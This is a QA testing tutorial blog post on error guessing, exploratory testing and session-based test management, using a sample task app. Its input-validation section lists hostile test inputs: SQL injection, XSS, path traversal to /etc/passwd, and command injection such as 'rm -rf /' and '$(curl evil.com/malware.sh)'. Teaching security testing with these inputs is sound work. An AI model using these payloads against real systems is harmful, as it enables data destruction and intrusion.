๐Ÿ“š Series Navigation:
โ† Previous: Part 4 - Pairwise Testing
๐Ÿ‘‰ You are here: Part 5 - Error Guessing & Exploratory Testing
Next: Part 6 - Test Coverage Metrics โ†’


Introduction: When Structure Meets Creativity

Welcome back! So far in this series, we've learned systematic, structured techniques:

  • Part 1: Requirement Analysis (ACID Test)
  • Part 2: Equivalence Partitioning & BVA (mathematical boundaries)
  • Part 3: Decision Tables & State Transitions (logical completeness)
  • Part 4: Pairwise Testing (combinatorial mathematics)

These are your science tools. They're repeatable, measurable, and teachable.

But here's the thing: the best bugs aren't found by following scripts.

They're found by QA engineers who:

  • Try the "weird" thing nobody thought to test
  • Ask "what if I do THIS?" at 4 PM on Friday
  • Have that gut feeling that "something's not right here"
  • Channel their inner chaos demon and try to break everything

Today we're covering the art of testing:

  1. Error Guessing - Predicting where bugs hide based on experience and intuition
  2. Exploratory Testing - Simultaneous learning, test design, and execution
  3. Session-Based Test Management - Structured approach to unstructured testing

These techniques find the bugs that automation misses, that requirements don't mention, and that make developers say "How did you even think to try that?!"

Let's embrace the chaos! ๐ŸŽญ


๐ŸŽฏ Error Guessing: The Chaos Demon Within

What is Error Guessing?

Error Guessing is using your experience, intuition, and knowledge of common failure patterns to predict where bugs are likely to hide. It's less "guessing" and more "educated prediction based on years of developers making the same mistakes."

Think of it like this:

  • A doctor sees symptoms and thinks "That sounds like flu"
  • A mechanic hears a noise and thinks "That's the transmission"
  • A QA engineer sees a feature and thinks "I bet they forgot to validate THIS"

The Common Bug Patterns

Here are the classics that keep appearing generation after generation:

1. Input Validation (or Lack Thereof) ๐Ÿ”

The Pattern: Developers trust user input. They shouldn't.

What to try:

SQL Injection Attempts:
โŒ Email: admin'; DROP TABLE users; --@example.com
โŒ Password: ' OR '1'='1
โŒ Search: '; DELETE FROM tasks WHERE '1'='1

XSS (Cross-Site Scripting):
โŒ Task Title: <script>alert('XSS')</script>
โŒ Description: <img src=x onerror="alert('XSS')">
โŒ Username: <iframe src="evil.com"></iframe>

Path Traversal:
โŒ File download: ../../../etc/passwd
โŒ Profile image: ../../config/database.yml
โŒ Export file: ..\..\..\windows\system32\

Command Injection:
โŒ Filename: test.txt; rm -rf /
โŒ Email: test@example.com | cat /etc/passwd
โŒ Search: $(curl evil.com/malware.sh)

TaskMaster 3000 Test Cases:

TC-005-001: SQL Injection in email field during registration
Classification: Security, Negative
Technique: Error Guessing

Test Data:
- Email: "admin'; DROP TABLE users; --@example.com"
- Password: "ValidPass123!"

Expected Result:
โœ… Input sanitized/escaped properly
โœ… Registration fails with "Invalid email format"
โœ… Database remains intact (VERY important!)
โœ… No SQL execution logged
โœ… Security event logged
โŒ No error message reveals database structure

Priority: Critical
Type: Security
TC-005-002: XSS in task description
Classification: Security, Negative
Technique: Error Guessing

Test Data:
- Title: "Innocent Task"
- Description: "<script>alert('You have been pwned!')</script>"

Expected Result:
โœ… Script tags escaped or removed
โœ… When viewing task, no JavaScript executes
โœ… Description displays as plain text or HTML-encoded
โœ… Browser console shows no errors
โœ… No alert popup appears

Verification:
- View task in list
- Open task details
- Edit task (script shouldn't execute in edit mode either)

Priority: Critical
Type: Security

2. Off-by-One Errors ๐Ÿ“

The Pattern: Developers mix up < and <=, or forget that arrays start at 0.

What to try:

TC-005-003: Task title exactly 200 characters (boundary)
Input: "A" * 200
Expected: โœ… Accepted

TC-005-004: Task title exactly 201 characters (just over)
Input: "A" * 201
Expected: โŒ Rejected

TC-005-005: Accessing first item (index 0)
Action: Click first task in list
Expected: โœ… Task opens correctly

TC-005-006: Empty list edge case
Precondition: User has 0 tasks
Action: Try to access "first" task
Expected: โŒ Graceful handling, no crash

3. Unicode & Special Characters ๐ŸŒ

The Pattern: Code works great for ASCII, fails spectacularly for anything else.

What to try:

TC-005-007: Emoji overload in task title
Input: 
- Title: "๐Ÿ”ฅ๐Ÿ’ฏ๐ŸŽ‰๐Ÿ˜Ž๐Ÿš€โšก๏ธ" * 20 (exceeds 200 char limit with emojis)
- Description: "Testing emoji support ๐Ÿ‘"

Expected:
โœ… Emojis stored correctly
โœ… Emojis display correctly
โœ… Character count works properly (emoji = 1 or more chars?)
โœ… No encoding corruption
โœ… Search still works

TC-005-008: International characters
Input:
- Title: "Tรขche importante avec des accents"
- Description: "ๆต‹่ฏ•ไธญๆ–‡ๅญ—็ฌฆ and ุงู„ุนุฑุจูŠุฉ ูˆ ืขื‘ืจื™ืช"

Expected:
โœ… All characters stored correctly
โœ… No encoding issues (UTF-8 throughout)
โœ… Sorting works correctly
โœ… Search handles international text

TC-005-009: Right-to-left text (Arabic, Hebrew)
Input: Task title in Arabic
Expected:
โœ… Text displays right-to-left
โœ… UI layout doesn't break
โœ… Mixed LTR/RTL text handled gracefully

4. Null, Empty, and Whitespace ๐Ÿ”ฒ

The Pattern: null, empty string "", and whitespace " " are all different, but developers often treat them the same.

What to try:

TC-005-010: Null vs empty vs whitespace password
Tests:
- Password = null (impossible via UI, but test API)
- Password = ""
- Password = "        " (8 spaces)
- Password = "\n\t\r" (whitespace characters)

Expected: All rejected appropriately

TC-005-011: Whitespace trimming
Input: 
- Email: "  user@example.com  " (spaces before/after)
- Password: "Pass123!  "

Expected:
โœ… Whitespace trimmed automatically
โœ… Registration succeeds
โœ… Can login with trimmed email

TC-005-012: Empty optional fields
Input:
- Title: "Valid Title"
- Description: "" (empty)
- Due date: null (not set)

Expected:
โœ… Task created successfully
โœ… Empty description stored as null or empty
โœ… No "undefined" or "null" displayed in UI

5. Race Conditions & Timing โฑ๏ธ

The Pattern: Code works fine when one user clicks once, breaks when 10 users click simultaneously.

What to try:

TC-005-013: Rapid-fire task creation
Action:
- Use automation to submit "Create Task" 100 times in 1 second
- OR open 10 browser tabs, click Create simultaneously

Expected:
โœ… Rate limiting kicks in, OR
โœ… All 100 tasks created with unique IDs
โœ… No database deadlocks
โœ… No duplicate task IDs
โœ… No "undefined" tasks

TC-005-014: Double-click on Submit button
Action:
1. Fill registration form
2. Double-click "Register" button very quickly

Expected:
โœ… Button disabled after first click
โœ… Only ONE account created
โœ… No duplicate database entries
โœ… No "account already exists" error

TC-005-015: Concurrent edits
Setup: Open same task in 2 browser tabs
Actions:
- Tab 1: Edit title to "Version A", save
- Tab 2: Edit title to "Version B", save simultaneously

Expected:
โœ… Last write wins (or conflict detection)
โœ… No data corruption
โœ… User notified of conflict
โœ… No lost data

6. Error Message Information Leakage ๐Ÿ•ต๏ธ

The Pattern: Error messages reveal too much about system internals.

What to try:

TC-005-016: Database error exposure
Action: Cause database error (disconnect DB, invalid query)
Expected:
โŒ Error message should NOT reveal:
   - Database type/version
   - Table names
   - Column names
   - SQL query text
   - File paths
โœ… Error message should say:
   - "Service temporarily unavailable"
   - "An error occurred. Please try again."

TC-005-017: Stack trace exposure
Action: Trigger application error
Expected:
โŒ No stack traces visible to user
โŒ No file paths revealed
โŒ No internal variable names
โœ… Generic error message
โœ… Error logged securely server-side

Building Your Error Guessing Intuition

How to get better at error guessing:

  1. Study common vulnerability lists
    • OWASP Top 10 (web security)
    • CWE Top 25 (common weaknesses)
  2. Read post-mortems and bug reports
    • Learn from production incidents
    • See patterns across projects
  3. Think like an attacker
    • "If I wanted to break this, how would I?"
    • "What did the developer probably forget?"
  4. Keep a "bug patterns" notebook
    • Document bugs you find
    • Note the patterns
    • Reference in future projects
  5. Follow security researchers
    • Twitter/X, blogs, CVE databases
    • See cutting-edge exploits

๐Ÿ” Exploratory Testing: Structured Discovery

What is Exploratory Testing?

Exploratory Testing is simultaneous learning, test design, and test execution. You're not following a scriptโ€”you're investigating the application like a detective.

Formal definition:

"Exploratory testing is an approach to software testing that is concisely described as simultaneous learning, test design, and test execution."
โ€” James Bach

What this means in practice:

Scripted Testing:
1. Read test case
2. Follow steps exactly
3. Record result
4. Move to next test case

Exploratory Testing:
1. Start with a mission
2. Interact with the app
3. Observe behavior
4. Form hypotheses
5. Design next test based on observations
6. Repeat

When Exploratory Testing Shines โœจ

Use exploratory testing when:

โœ… New features with limited documentation

  • Requirements are still evolving
  • No time to write formal test cases
  • Need quick feedback

โœ… Usability and user experience issues

  • "Does this feel right?"
  • Workflow confusion
  • Visual inconsistencies

โœ… Complex integrations

  • Multiple systems interacting
  • Hard to predict all scenarios
  • Need to "feel out" the behavior

โœ… Supplementing automated tests

  • Automation covers happy paths
  • Exploratory finds the weird stuff

โœ… Time-constrained situations

  • Need to test NOW
  • Waiting for test cases isn't an option

Don't use exploratory testing when:

โŒ Regulatory compliance testing (need documented proof)
โŒ Regression testing (automation is better)
โŒ Exact reproducibility required
โŒ Multiple testers need same steps


๐Ÿ—“๏ธ Session-Based Test Management (SBTM)

The Challenge with Exploratory Testing

Problem: "I spent 3 hours testing" isn't helpful for:

  • Managers (what did you test?)
  • Developers (what did you find?)
  • Future you (what areas did you cover?)

Solution: Session-Based Test Management adds structure to exploratory testing without killing its creativity.

The SBTM Framework

graph LR A[๐Ÿ“ Create Charter] --> B[โฐ Time-box Session
60-120 min] B --> C[๐Ÿ” Explore & Document] C --> D[๐Ÿ“Š Write Report] D --> E[๐Ÿค Debrief] E --> F{More Testing?} F -->|Yes| A F -->|No| G[โœ… Done] style A fill:#dbeafe style B fill:#fef3c7 style C fill:#ddd6fe style D fill:#fecaca style E fill:#bbf7d0 style G fill:#86efac

Step 1: Create a Charter

A charter is your testing missionโ€”what you're investigating and why.

Charter template:

EXPLORATORY TEST CHARTER

Session ID: EXP-001
Charter: [MISSION STATEMENT]
Duration: [60-120 minutes]
Tester: [Name]
Date: [YYYY-MM-DD]

MISSION:
Explore [FEATURE/AREA] looking for [TYPES OF ISSUES]

AREAS TO EXPLORE:
- [Specific area 1]
- [Specific area 2]
- [Specific area 3]

RISKS TO INVESTIGATE:
- [Risk 1]
- [Risk 2]

TEST DATA NEEDED:
- [Data requirement 1]
- [Data requirement 2]

Example Charter: Password Reset Flow

EXPLORATORY TEST CHARTER

Session ID: EXP-TaskMaster-001
Charter: Explore password reset functionality for security vulnerabilities 
         and edge cases
Duration: 90 minutes
Tester: QA Jane
Date: 2025-11-20

MISSION:
Investigate password reset flow looking for:
- Security vulnerabilities
- Edge cases not covered by scripted tests
- Usability issues
- Race conditions

AREAS TO EXPLORE:
1. Email delivery timing and content
2. Reset link expiration behavior
3. Multiple simultaneous reset requests
4. Password validation during reset
5. Browser back/forward button behavior
6. Mobile vs desktop experience

TESTING HEURISTICS TO APPLY:
- Goldilocks (too big, too small, just right)
- Interruptions (close browser, lose connection)
- Time travel (expired links, manipulated timestamps)
- Boundaries (password length limits)

TEST DATA NEEDED:
- 3 test accounts with different email providers
- Various browsers/devices
- Valid and expired reset tokens

RISKS TO INVESTIGATE:
- Can users reset other people's passwords?
- What if reset link is used multiple times?
- What happens if password reset during active session?
- Can reset tokens be predicted/brute-forced?

Step 2: Execute the Session (Time-boxed)

During the session:

  1. Start timer (90 minutes)
  2. Focus exclusively on testing (no Slack, no email)
  3. Take notes as you go (not after!)
  4. Document findings immediately
  5. Take screenshots/videos of anything interesting
  6. Track time breakdown

Sample Session Notes:

SESSION NOTES - EXP-TaskMaster-001

[00:05] Starting session. Test environment ready.

[00:15] ๐Ÿ› BUG FOUND: Password reset link still works after password changed
Steps:
1. Request password reset for user@example.com
2. Receive reset email
3. Change password via Settings (without using reset link)
4. Click reset link from email
5. BUG: Link still works! Can change password again
Severity: HIGH
Impact: Could allow attacker with email access to override new password
Screenshot: bug-001-reset-link-reuse.png

[00:32] ๐Ÿ’ก OBSERVATION: Reset email takes 5+ minutes with Outlook.com
- Gmail: ~30 seconds
- Outlook: 5-8 minutes
- Yahoo: 2-3 minutes
Not a bug, but UX issue. Users might request multiple resets.
Suggestion: Add message "Email may take up to 10 minutes to arrive"

[00:47] โœ… POSITIVE: Mobile layout works well!
- Tested iOS Safari, Android Chrome
- Responsive design good
- Forms easy to fill
- No issues found

[00:55] ๐Ÿ› BUG FOUND: No rate limiting on reset requests
Steps:
1. Request password reset
2. Immediately request again (x10)
3. BUG: Received 10 emails, no rate limit
Impact: Could be used for email bombing attack
Severity: MEDIUM
Recommendation: Limit to 3 requests per 15 minutes

[01:10] โ“ QUESTION: Reset link expiration time?
- Docs say "short-lived" but not specific
- Tested: Still works after 2 hours
- Tested: Fails after 24 hours
- Actual expiration: Somewhere between 2-24 hours
Action: Need to clarify with dev team

[01:20] ๐Ÿ” EXPLORED: Browser back button after reset
- Reset password successfully
- Click browser back button
- Form shows "Password successfully reset"
- Clicking "Reset Again" shows error (link expired)
- Behavior: Correct! โœ…

[01:25] โฐ SESSION ENDING: Wrapping up notes

TIME BREAKDOWN:
- Test Design & Execution: 60 min (67%)
- Bug Investigation & Documentation: 20 min (22%)
- Session Setup: 10 min (11%)

COVERAGE ASSESSMENT:
โœ… Tested: Email delivery, link validity, password validation
โœ… Tested: Multiple requests, mobile devices, browser behavior
โŒ Not Tested: Email client rendering (need more accounts)
โŒ Not Tested: Accessibility (screen readers) - out of time

BUGS FOUND: 2 (1 High, 1 Medium)
OBSERVATIONS: 2
QUESTIONS: 1

Step 3: Session Report

Report Template:

EXPLORATORY TESTING SESSION REPORT

Session: EXP-TaskMaster-001
Feature: Password Reset Flow
Duration: 90 minutes
Date: 2025-11-20
Tester: QA Jane

CHARTER:
Explore password reset for security issues and edge cases

WHAT WAS TESTED:
โœ… Email delivery and timing
โœ… Reset link validity and expiration
โœ… Multiple reset requests
โœ… Mobile responsiveness
โœ… Browser navigation behavior

WHAT WAS NOT TESTED (and why):
โŒ Email client rendering - Need more test accounts
โŒ Accessibility - Ran out of time, needs separate session
โŒ Internationalization - Only tested English
โŒ Slow/unstable networks - Need throttling tools

BUGS FOUND:
1. [HIGH] Reset link works after password changed (BUG-1337)
2. [MEDIUM] No rate limiting on reset requests (BUG-1338)

OBSERVATIONS:
- Outlook.com email delivery very slow (5-8 min)
- Mobile experience is good
- Reset link expiration unclear (between 2-24 hours)

QUESTIONS FOR TEAM:
1. What is the intended reset link expiration time?
2. Should we implement rate limiting? (Recommend: yes)
3. Should reset links be invalidated when password changes? (Recommend: yes)

RISKS DISCOVERED:
โš ๏ธ Email access = password control (even after password change)
โš ๏ธ Potential for email bombing attack

RECOMMENDED NEXT STEPS:
โ–ก Fix HIGH severity bug before release
โ–ก Clarify and document reset link expiration
โ–ก Add rate limiting (3 requests / 15 min)
โ–ก Schedule follow-up session for accessibility testing

TIME BREAKDOWN:
- Execution: 67%
- Documentation: 22%
- Setup: 11%

SESSION RATING: ๐ŸŒŸ๐ŸŒŸ๐ŸŒŸ๐ŸŒŸ (4/5)
Found critical bugs, good coverage, time well spent

Step 4: Debrief

Debrief meeting (15-30 minutes):

Attendees:

  • Tester(s) who ran session
  • Relevant stakeholders (dev lead, product owner)

Agenda:

  1. Present findings (5-10 min)
  2. Discuss bugs and priority (5-10 min)
  3. Answer questions (5-10 min)
  4. Plan next steps (5 min)

Sample Debrief:

DEBRIEF NOTES - EXP-TaskMaster-001

Attendees: QA Jane, Dev Lead Mike, PM Sarah

KEY FINDINGS PRESENTED:
โœ… Found 2 bugs (1 HIGH, 1 MEDIUM)
โœ… Identified usability improvement (email delay message)
โœ… Discovered unclear requirement (reset expiration time)

DECISIONS MADE:
1. BUG-1337 (reset link reuse) โ†’ Fix immediately, blocks release
2. BUG-1338 (rate limiting) โ†’ Fix in this sprint, medium priority
3. Email delay message โ†’ Add to backlog for future sprint
4. Reset expiration โ†’ Dev team will clarify and document

QUESTIONS ANSWERED:
Q: What's the reset link expiration?
A: Intended to be 24 hours, will add test to verify

Q: Why no automated tests for this?
A: Complex timing issues, good for exploratory first

FOLLOW-UP ACTIONS:
โ–ก Mike: Fix BUG-1337 by Thursday
โ–ก Mike: Implement rate limiting
โ–ก Sarah: Update requirements doc with expiration time
โ–ก Jane: Create bug reports for both issues
โ–ก Jane: Schedule accessibility testing session next week

WHAT WORKED WELL:
โœ… Time-boxing kept session focused
โœ… Found issues scripts would have missed
โœ… Good documentation during session

WHAT COULD IMPROVE:
โš ๏ธ Need better test data setup (more email accounts)
โš ๏ธ 90 min felt slightly long, try 60 min next time

NEXT CHARTER IDEAS:
1. Explore account lockout after failed login attempts
2. Investigate task attachment upload security
3. Test password strength meter accuracy

๐ŸŽฏ Combining Error Guessing with Exploratory Testing

The most powerful approach? Combine them!

Example Session Charter:

EXPLORATORY TEST CHARTER

Charter: Explore task creation for security vulnerabilities and edge cases
Duration: 90 minutes

MISSION:
Use error guessing to test task creation for common security issues,
then explore unexpected behaviors

ERROR GUESSING CHECKLIST:
โ–ก SQL injection in title/description
โ–ก XSS attempts in all text fields
โ–ก Path traversal in file attachments
โ–ก Emoji/Unicode in all fields
โ–ก Null/empty/whitespace inputs
โ–ก Extremely long inputs (>1MB)
โ–ก Race conditions (rapid task creation)
โ–ก Special characters in all fields

EXPLORATORY FOCUS:
After checklist, freely explore:
- Task creation workflow
- Interaction with other features
- Mobile vs desktop differences
- Anything that "feels wrong"

EXPECTED TIME:
- Error guessing checklist: 30-40 min
- Free exploration: 50-60 min

This gives you:

  • โœ… Structure from error guessing patterns
  • โœ… Coverage of known vulnerabilities
  • โœ… Creativity from free exploration
  • โœ… Best of both worlds

๐Ÿ’ก Practical Tips

For Error Guessing

Do's โœ…:

  • Maintain a "bug patterns" database from past projects
  • Think like an attacker - "How would I break this?"
  • Test the unexpected - Users will definitely try it
  • Document your attempts - Even if no bugs found
  • Share findings - Help team learn common patterns

Don'ts โŒ:

  • Don't only test happy paths - Errors hide in darkness
  • Don't assume "the UI prevents it" - Test the API too
  • Don't skip security testing - It's not "someone else's job"
  • Don't test randomly - Use patterns and experience

For Exploratory Testing

Do's โœ…:

  • Use time-boxing - Prevents endless wandering
  • Take notes immediately - Memory is unreliable
  • Focus on one charter - Don't try to test everything
  • Debrief promptly - While session is fresh
  • Combine with scripted tests - They complement each other

Don'ts โŒ:

  • Don't skip the charter - "Just testing randomly" isn't exploratory
  • Don't multitask - Close Slack, focus on testing
  • Don't document after - Take notes during session
  • Don't explore without purpose - Have a mission
  • Don't forget to report findings - Exploration without documentation is wasted

๐Ÿ“Š Real Results

Case Study: E-commerce Checkout

Context: Major e-commerce platform, payment processing flow

Scripted Testing Results:

  • 45 test cases executed
  • 3 bugs found
  • All "expected" scenarios covered

Exploratory Testing (2 sessions, 180 min total):

  • 0 formal test cases
  • 11 bugs found, including:
    • 1 CRITICAL: Race condition allowing double charges
    • 2 HIGH: XSS in order notes field
    • 3 MEDIUM: Error message leaking customer data
    • 5 LOW: Usability issues

Impact:

  • Prevented double-charging customers (would have been massive PR disaster)
  • Fixed security issues before security audit
  • Improved checkout conversion rate by 2% (UX fixes)

ROI:

  • Time invested: 180 minutes
  • Issues prevented: Potentially millions in damages + reputation
  • Customer trust: Priceless

๐ŸŽ“ Conclusion: Embrace Your Inner Chaos Demon

Testing isn't just about following proceduresโ€”it's about curiosity, creativity, and controlled chaos.

Key Takeaways

  1. Error guessing is educated prediction, not random luck. Learn patterns, build intuition, think like an attacker.
  2. Exploratory testing finds bugs automation misses. The combination of human creativity and systematic exploration is powerful.
  3. SBTM makes exploratory testing measurable. Charters, time-boxing, and debriefs provide structure without killing creativity.
  4. Combine techniques. Use error guessing patterns within exploratory sessions. Balance scripted and exploratory testing.
  5. Document everything. Notes during session, reports after, debriefs with team. Your findings only matter if people know about them.

Your Action Plan

This week:

  1. โœ… Create your first exploratory testing charter
  2. โœ… Run a 60-minute session
  3. โœ… Document with SBTM format
  4. โœ… Share findings with team

This month:

  1. โœ… Build your "bug patterns" notebook
  2. โœ… Schedule regular exploratory sessions (1-2 per week)
  3. โœ… Review OWASP Top 10
  4. โœ… Teach error guessing to junior QA

This year:

  1. โœ… Develop strong security testing skills
  2. โœ… Master SBTM framework
  3. โœ… Become the "bug whisperer" on your team

What's Next?

In Part 6, we return to structure and metrics. We'll explore Test Coverage in depthโ€”how to measure it, what actually matters, and how to prove your testing is effective without drowning in meaningless numbers.

We'll cover:

  • Requirement vs Code coverage
  • The test pyramid (with real numbers)
  • Metrics that actually help
  • Dashboards that tell a story

Coming Next Week:
Part 6: Test Coverage Metrics - What Actually Matters
๐Ÿ“Š


๐Ÿ“š Series Progress

โœ… Part 1: Requirement Analysis
โœ… Part 2: Equivalence Partitioning & BVA
โœ… Part 3: Decision Tables & State Transitions
โœ… Part 4: Pairwise Testing
โœ… Part 5: Error Guessing & Exploratory Testing โ† You just finished this!
โฌœ Part 6: Test Coverage Metrics
โฌœ Part 7: Real-World Case Study
โฌœ Part 8: Modern QA Workflow
โฌœ Part 9: Bug Reports That Get Fixed
โฌœ Part 10: The QA Survival Kit


๐Ÿงฎ Quick Reference Card

Error Guessing Checklist

SECURITY:
โ–ก SQL injection in all text inputs
โ–ก XSS in all user content
โ–ก Path traversal in file operations
โ–ก Command injection in system calls
โ–ก Authentication bypass attempts
โ–ก Authorization escalation

INPUT VALIDATION:
โ–ก Null values
โ–ก Empty strings
โ–ก Whitespace only
โ–ก Extremely long inputs
โ–ก Special characters
โ–ก Unicode & emojis
โ–ก Negative numbers (where positive expected)

TIMING & CONCURRENCY:
โ–ก Rapid button clicks (double-click)
โ–ก Simultaneous operations
โ–ก Very slow connections
โ–ก Timeouts and interruptions
โ–ก Race conditions

ERROR HANDLING:
โ–ก Information leakage in errors
โ–ก Stack trace exposure
โ–ก Database error messages
โ–ก File path disclosure

SBTM Session Checklist

BEFORE SESSION:
โ–ก Create charter with clear mission
โ–ก Set time box (60-120 min)
โ–ก Prepare test data
โ–ก Clear calendar (no interruptions)
โ–ก Setup note-taking tools

DURING SESSION:
โ–ก Start timer
โ–ก Take notes continuously
โ–ก Screenshot interesting findings
โ–ก Track time breakdown
โ–ก Stay focused on charter

AFTER SESSION:
โ–ก Write session report
โ–ก Create bug reports
โ–ก Calculate time breakdown
โ–ก Schedule debrief
โ–ก Plan next session

DEBRIEF:
โ–ก Present findings
โ–ก Discuss priority
โ–ก Answer questions
โ–ก Plan follow-up actions
โ–ก Document decisions

Remember: The best bugs are found by those brave enough to try the weird stuff! ๐Ÿ’ฅ

What's your favorite bug you've found through exploratory testing? Share in the comments!